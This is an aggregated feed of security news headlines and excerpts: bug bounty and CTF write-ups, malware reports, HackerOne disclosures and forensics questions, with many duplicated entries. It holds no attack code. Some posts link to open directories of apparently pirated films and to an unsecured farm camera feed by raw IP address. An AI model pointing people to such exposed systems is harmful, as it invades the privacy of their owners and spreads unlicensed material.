    译者:知道创宇404实验室翻译组 原文链接:https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ 黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是 Windows 11升级最...
  • Open

    Pretty decent collection of movies that is well organized (as well as software and other stuff)
    ​ http://162.12.215.254/Data/ I was looking for the movies and the English ones are mostly good quality, and without any burned in subs or forced dual languages. ​ Sorry if repost. Found searching, "English" in search box with "video" in ['filegroup or ext'] box on eyedex.org submitted by /u/Rest-in-Peep [link] [comments]  ( 1 min )
    First contribution
    https://who.4386.ltd/Doctor/ I think all marvel files are in 4K. there are more movies in the "movies for" tab. https://who.4386.ltd/Heng/ P.S. the site is in chinese so let chrome translate the page first. submitted by /u/CompetitiveMango12 [link] [comments]  ( 1 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hackeando Wordle
    Cómo adivinar la palabra del día a través de ingeniería inversa Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hackeando Wordle
    Cómo adivinar la palabra del día a través de ingeniería inversa Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hackeando Wordle
    Cómo adivinar la palabra del día a través de ingeniería inversa Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )

  • Open

    “That SweetPot of Data Net-tar” My first Honey Pot Walkthrough Part 3
    Part 1 Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on InfoSec Write-ups »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on Medium »  ( 5 min )
    I Too Want a Key Collection — OSINT Challenge 15
    On Jan 20, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out when the… Continue reading on Medium »  ( 2 min )
    How To Find Your Data In Web With Pimeyes And Other Reverse Tools
    Reverse Image Search is a web-based tool for finding identical and similar images related to the image you are looking for. Marketers can… Continue reading on Medium »  ( 2 min )
  • Open

    The Unobvious About XSS and HTML Encoding
    Many people know that before getting the value of a tag attribute, the browser decodes the HTML entities inside. Let’s say if you try to… Continue reading on Medium »  ( 2 min )
    How to get into bug bounties — A list of resources by The XSS Rat
    Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about… Continue reading on Medium »
    What is the Bug Bounty ?
    Often translated into French as “prime au bogue” or “bounty for the detected flaw”, the bug bounty appeared in the 90s within Netscape… Continue reading on CyberSecurity and GDPR compliance »  ( 3 min )
    Research on Clickjacking & Network Sniffing- Cyber Sapiens Internship Task-14
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    How I did Full Account Takeover (FATO) using forgot password link?
    How I was able to takeover admin account by exploiting forgot password functionality. Continue reading on Medium »  ( 2 min )
    Broken Access Control Overview
    As I was going through web application vulnerabilities during my 100 days of hacking, I came across this interesting topic Broken Access… Continue reading on Medium »  ( 1 min )
    BigQuery SQL Injection Cheat Sheet
    Last year, we (My researcher partner on this topic, Anil and me) and found a SQL injection vulnerability on a target at Synack which was… Continue reading on Medium »  ( 5 min )
    Bug Bounty — Bypassing Endpoints
    Hello there, let’s discuss on how to bypass endpoints. Before moving further, let’s take a quick glance about endpoints. Continue reading on Medium »  ( 2 min )
    My First Bounty and How I Got It
    Hello!! This is my first article, and I really hope you enjoy it! From June 2021, I began looking for issues on the websites. Continue reading on Medium »  ( 1 min )
    Javascript Security — Weak Type Bypass
    As you may know, Javascript is a weakly typed language. This features of the language can be used by hackers to bypass some checks within… Continue reading on Medium »  ( 1 min )
  • Open

    PrivateLoader to new Anubis Loader
    submitted by /u/sysopfb [link] [comments]
    Eliminating Dangling Elastic IP Takeovers with Ghostbuster
    submitted by /u/Mempodipper [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Concrete CMS part2 (Privesc/SSRF/etc.)
    submitted by /u/adrian_rt [link] [comments]
    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/chicksdigthelongrun [link] [comments]
    MyloBot 2022 – Analysis of the new version of this evasive botnet that appears to just send extortion emails, but has the potential to do much more.
    submitted by /u/woja111 [link] [comments]  ( 1 min )
  • Open

    Arbitrary File Read at via filename parameter
    U.S. Dept Of Defense disclosed a bug submitted by shiar: https://hackerone.com/reports/1436223
    Broken Authentication
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/409237
    IDOR
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/389250
    CUI Labelled document out in the open
    U.S. Dept Of Defense disclosed a bug submitted by pll25: https://hackerone.com/reports/1436460
    EC2 subdomain takeover at http:///
    U.S. Dept Of Defense disclosed a bug submitted by dreyand72: https://hackerone.com/reports/1296366
    XSS trigger via HTML Iframe injection in ( https:// ) due to unfiltered HTML tags
    U.S. Dept Of Defense disclosed a bug submitted by rozerx00: https://hackerone.com/reports/1200770
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457277
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457546
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457493
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457444
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457413
    (CORS) Cross-origin resource sharing misconfiguration on https://
    U.S. Dept Of Defense disclosed a bug submitted by fiveguyslover: https://hackerone.com/reports/995144
    default creds on https://
    U.S. Dept Of Defense disclosed a bug submitted by pirateducky: https://hackerone.com/reports/711662
    Unauthorized access to PII leads to MASS account Takeover
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1061736
    RXSS ON https://
    U.S. Dept Of Defense disclosed a bug submitted by iam_a_jinchuriki: https://hackerone.com/reports/1244145
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1415825
  • Open

    Preventing Replay Attacks
    Hey all, I'm going to be participating in an Attack/Defend CTF, and apparently one of the biggest vulnerabilities from previous competitions was replay attacks. Some more details: The server that is traditionally vulnerable to replay attacks is a headless Arch Linux box with limited disk space and no access to the Internet. I have superuser access this box via SSH; This server exists outside of our defensive LAN. Its sole responsibility is relaying commands to/from external entities. Think like a self-driving Tesla car being told what to do: "Turn left, turn left, turn left...". I should underscore that if an attacker replayed these commands, the car would inevitably crash. I've configured the IPtables on the box to: Drop invalid traffic; Accept existing traffic; Accept SSH from our administrative workstation; Accept commands from our client workstation; Forward traffic to the external entities; and Drop everything else. I want to inquire about any lightweight transport layer security options that I could implement to secure the bidirectional communication. I'm exploring IPsec/VPNs but I haven't found success. I just wanted to ask if I was missing anything simple here. Thank you for your time. submitted by /u/InfamousClyde [link] [comments]  ( 1 min )
    Alienvault OSSIM OTX Issue
    So I just set up a new OSSIM instance from scratch. I've added my API key (and have subsequently regenerated new ones for troubleshooting). I'm not sure how long I have to wait for the OTX subscriptions to sync and download to the OSSIM client, but when I click the dropdown on the OTX page in OSSIM, and click on View Account Details, it takes me to the otx.alienvault.com webpage, and shows that I'm not following or subscribed to any pulses.. However, if I log into OTX with the same account, it shows that I am subscribed to several. I've ran the 'curl' command to test the OTX-API key and it worked without error. I've also noticed that another alarm I am receiving is "no information available. you are no longer subscribed to this pulse" but there is no information as to what pulse they're referring to. And googling it found an Alienvault KB that said it was fixed in 5.4. I'm on 5.8 (the latest version, up to date as well). ​ Anyone else having this issue with Alienvault OSSIM and OTX not syncing? If there's a command to force sync (I've done the option in the console for updating the threat feeds), that would be appreciated. submitted by /u/Phyxiis [link] [comments]  ( 1 min )
    Building a forensics lab - what are must haves? Any templates?
    We have some spare resources and we're looking to build a dedicated forensics, analysis lab. We have a couple poweredges we can use. The current plan is a segregated environment to clone suspect machines and see how they interact and do whatever analysis is required. I don't really know where to start expect segregating it or having a faux network connection. It seems a lot of people just run labs locally, however we're required to essentially have thin clients. What have your team built for this? Any must have tools? submitted by /u/idnUygelps [link] [comments]  ( 3 min )
    What are the Open Source Tools Network Scanning Tools?
    We are a medium size healthcare medical center, maybe 300 nodes. What are the available open source /free tools I can use to achieve this use case ? Scanner that will say “2 new systems in this". Results should give me the OS version and check if antivirus is installed. submitted by /u/techno_it [link] [comments]  ( 1 min )
    Using Tomcat Virtual Host Manager
    I found access to Tomcat Virtual Host Manager on Tomcat 9 (not the one that deploys WAR files) which according to docs means the account has the role "admin-gui". I've been asked if I can pivot further using this but I'm completely stuck because I've never used it. All I can use is a form which can "Add Virtual Host" but from my testing (and limited experience with Tomcat) I've run into a halt. Anyone know if this can be used to privesc? submitted by /u/plutofoxtrot [link] [comments]  ( 1 min )
    LastPass free account with yubikey?
    Lastpass free account by default doesn't support Yubikey. But lastpass support Google auth. In theory, they are all compatible because of the same protocol. Can I just set select "Google Auth." then go ahead and use my Yubico auth. app? Thanks. Anyone has experience? submitted by /u/mk_life [link] [comments]  ( 1 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 2 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will be learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will be learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will be learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/dmchell [link] [comments]
    cube0x0/KrbRelay: Framework for Kerberos relaying
    submitted by /u/dmchell [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]
    Install Invisible Malicious Apps Remotely, Acting As Updates
    submitted by /u/banginpadr [link] [comments]
    How I Hacked A Reputed Hacker
    submitted by /u/banginpadr [link] [comments]
  • Open

    Preventing, Detecting, & Hunting for Exploitation of the Log4j 2 Vulnerability
    Article URL: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ Comments URL: https://news.ycombinator.com/item?id=30335183 Points: 2 # Comments: 0  ( 28 min )
  • Open

    aimbot idea?
    I was thinking that what if there was a type of screen reader or something like that that detected enemy characters in a video game and locked your mouse to it? is that even possible? just an idea I don't know the technicalities submitted by /u/mr_killlerrrrr [link] [comments]  ( 1 min )
  • Open

    Netsparker Enterprise achieves WCAG 2.1 accessibility compliance
    Invicti is proud to break down barriers of access in software. Learn more about how we’ve achieved WCAG 2.1 AA compliance for accessibility standards. READ MORE  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    Article URL: https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/ Comments URL: https://news.ycombinator.com/item?id=30333641 Points: 2 # Comments: 0  ( 14 min )
    CVE-2021-23567
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-23567 Comments URL: https://news.ycombinator.com/item?id=30328625 Points: 4 # Comments: 4  ( 4 min )
  • Open

    SecWiki News 2022-02-14 Review
    SecWiki周刊(第415期) by ourren Java安全研究与安全开发面试题总结 by ourren 记一次挖矿病毒的应急响应 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-14 Review
    SecWiki周刊(第415期) by ourren Java安全研究与安全开发面试题总结 by ourren 记一次挖矿病毒的应急响应 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    What are The Red Team and Blue Team in Cyber Security?
    The red team comprises offensive security experts that attempt to attack the cybersecurity defenses of an organization. On the other hand… Continue reading on Medium »  ( 1 min )
  • Open

    Small Business DFIR Services
    Hey all, I wanted to discuss something with this community. Recently I got an ask to recommendation DFIR services for a small business (<50 employees) after they were hacked. I started thinking and realized their was not any business I knew of to help small businesses. ​ First, if anyone knows of a US-based company for DFIR services I would appreciate a suggestion. ​ Second, I do not believe there is any low-cost DFIR company that is meant for small (or medium-sized) business. So, what do you think it would take for these large consulting firms- or even a government service to provide accessible services to any small business that doesn't have the capital to hire the larger cybersecurity or consulting firms? I.e. Create a special LICENSE on open source projects, organize a non for-profit with rotating analysts, pro-bono cyber, etc. submitted by /u/Jklm264 [link] [comments]  ( 7 min )
  • Open

    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
  • Open

    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
  • Open

    BotenaGo 僵尸网络源码泄露,攻击者武器库又增加
    2021 年 11 月,AT&T Alien Labs 首次披露 Golang 编写的恶意软件 BotenaGo。最近,该恶意软件的源代码被上传到 GitHub 上,这可能会催生更多的恶意软件变种。  ( 1 min )
    FritzFrog 疯狂扩张,近四成受害者在中国
    FritzFrog 主要通过 SSH 爆破进行传播,爆破成功后部署恶意软件。研究人员发现,FritzFrog 大约 37% 的失陷主机位于中国。  ( 1 min )
    FreeBuf早报 | 修订后的《网络安全审查办法》今日施行;知乎称未使用行为感知系统监测员工
    知乎表示,对于违规收集个人信息安全的行为,本身严重背离知乎价值观,对这类系统我们一向持坚决反对态度。  ( 1 min )
    超6.02亿美元!2021年勒索软件获得赎金创新高
    调查显示,2021年全球范围内勒索软件威胁正持续增加。全球的组织、机构在过去一年共支付了超6亿美元的加密货币。
    一份解密的文件披露,中央情报局正秘密搜集美国本土公民信息
    根据2月10日解密的一份文件,美国中央情报局在未经国会允许的情况下,一直秘密地搜集美国本土公民数据。  ( 1 min )
    Apple 修复了新的“零日”漏洞
    苹果公司已经成功修复一个新的WebKit零日漏洞。  ( 1 min )
    2021年全球一半的电子邮件是垃圾邮件
    根据卡巴斯基的最新报告,去年超过一半的邮件是垃圾邮件  ( 1 min )
    喜茶安全部门全部被裁,元芳你怎么看?
    安全部门是如此不受重视,当企业经营出现问题时,几乎是第一个被裁掉,以此降低企业经营成本。  ( 1 min )
    如何做好安全研发人才招聘之团队模型的建立
    网络安全科技企业,最宝贵的就是人才。一般来说,企业70%左右的成本都是人力成本,没有合适的人,一切远大的科技理想都是镜中花  ( 1 min )
  • Open

    grave headstones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Cams at an Asian hog farm
    http://27.156.152.250:8889/ If you're lucky you'll see the grumpy old farmer. Warning, possibly some dead animals and cruelty. -edit submitted by /u/inoculatemedia [link] [comments]
  • Open

    ModifiedElephant:十年潜伏,印度黑客组织浮出水面
    译者:知道创宇404实验室翻译组 原文链接:https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt 摘要 我们的研究将这十年的活动迹象归因于一种我们称之为ModifiedElephant的黑客组织。 ModifiedElephant对印度各地的人权活动家、人权捍卫者、学者和律师进行有针对性的攻击,目...
    ModifiedElephant:十年潜伏,印度黑客组织浮出水面
    译者:知道创宇404实验室翻译组 原文链接:https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt 摘要 我们的研究将这十年的活动迹象归因于一种我们称之为ModifiedElephant的黑客组织。 ModifiedElephant对印度各地的人权活动家、人权捍卫者、学者和律师进行有针对性的攻击,目...
  • Open

    ModifiedElephant:十年潜伏,印度黑客组织浮出水面
    译者:知道创宇404实验室翻译组 原文链接:https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt 摘要 我们的研究将这十年的活动迹象归因于一种我们称之为ModifiedElephant的黑客组织。 ModifiedElephant对印度各地的人权活动家、人权捍卫者、学者和律师进行有针对性的攻击,目...
    ModifiedElephant:十年潜伏,印度黑客组织浮出水面
    译者:知道创宇404实验室翻译组 原文链接:https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt 摘要 我们的研究将这十年的活动迹象归因于一种我们称之为ModifiedElephant的黑客组织。 ModifiedElephant对印度各地的人权活动家、人权捍卫者、学者和律师进行有针对性的攻击,目...

  • Open

    Intigriti XSS Challenge 0222 — Write-Up
    XSS challenge by intigriti Solved by Th3Mind Continue reading on Medium »  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222 Continue reading on InfoSec Write-ups »
    #Bug Bounty - How I was able to purchased premium feature just for “1” PKR by (Parameter…
    Price Manipulation Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — DAY 9
    Objectives of day 9 : Continue reading on Medium »  ( 1 min )
    Install LinkFinder on Kali Linux
    LinkFinder : a tool written in python that finds the endpoints from/in JavaScript files. Continue reading on Medium »  ( 1 min )
    How to Setup/Configure Burpsuite with Firefox
    Hello all i am back with another blog on bug bounty we will see how we can setup/configure burpsuite with firefox to intercept all… Continue reading on Medium »  ( 1 min )
    Exploiting CVE-2019–5418- File Content Disclosure on Rails
    In Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1, and v3, a File Content Disclosure vulnerability exists where properly designed… Continue reading on Medium »  ( 1 min )
    Broken Link Hijacking - Mr. User-Agent
    Summary : Continue reading on Medium »  ( 3 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much Continue reading on Medium »  ( 3 min )
  • Open

    How do Secrets Managers help?
    Nearly everyone seems to say that the best way to store secrets in a cloud environment is to put them in a secrets manager and only fetch them when needed. This has the advantage of allowing seamless key rotation, adding IAM policies, etc. Does this actually increase the security posture of the app though? The app still needs to authenticate with a key manager somehow - I would guess by way of an API token or similar. If the app or the box serving the app get owned, doesn't this basically compromise all the secrets in the secret manager accessible to the app? Also, assuming my previous statement is correct, there must be a "bootstrapping secret" which is injected to the app that lets it talk to the secrets manager. How does the app get access to that secret? I don't mean in a specific cloud (e.g. Azure, GCP, AWS) - just in general, how does whoever is providing the secret know to trust the app? submitted by /u/parallelocat [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target to send to S3: .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X Is this the way? From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
    Given that smart light bulbs can be 'hidden' in plain sight, and most of them are reflashable - how long will it be until the first one is used to gain a foothold inside a target network?
    I was actually looking for something to use as a PWNplug, but even those stand out a bit, whereas wifi light bulbs are ... just light bulbs, with wifi, and a devkit. https://hackaday.com/2020/02/11/custom-firmware-for-cheap-smart-bulbs-is-a-cinch-to-tinker-with/ Most of them seem to be based on the same Expressif chipset https://github.com/ct-Open-Source/tuya-convert https://github.com/arendst/Tasmota This was more of a rhetorical question, but I thought it might interest some of you. submitted by /u/boli99 [link] [comments]  ( 3 min )
    Career in Bug Bounty?
    I read an article about a pen tester making 300k off a bug bounty. My question is can someone live off this? Can anyone do this with the right knowledge and training? Do you have to be some sort of genius? submitted by /u/Bugskee [link] [comments]  ( 3 min )
  • Open

    Who Needs A Niche Threat Actor Specific IoC (Indicator of Compromise) STIX/STIX2/TAXII Feed?
    UPDATE: The feed's official web site including the brochure. Dear blog readers, Who needs access to my STIX/STIX2/TAXII Threat Actor Specific IoC (Indicator of Compromise) feed? Drop me a line today at dancho.danchev@hush.com Stay tuned!
  • Open

    Resource/Reference for Crypto mining Artifacts?
    Looking for a good resource (web page, poster, graphic etc.) for locating artifacts that indicate the use of a crypto miner on a computer. Does anyone know of anything? submitted by /u/admincee [link] [comments]  ( 1 min )
    Magnet Web Page Saver
    Has anyone here had working experience with the free tool Web Page Saver? I am looking into using it at my lab and have some serious questions about how it work and when/what cases it should be used with. Any guidance is appreciated submitted by /u/trex4n6 [link] [comments]  ( 1 min )
    Bulk Extractor Review
    Howdy all! Newbie alert! So I currently started using Bulk_Extractor with Volatility tor Memory Forensics! My real question is how reliable are the results obtained from Bulk Extractor? I see a lot of explicit websites in my Bulk Extractor Domain Histogram results! But can’t be able to find them in Volatility! Any idea of how this works? submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st 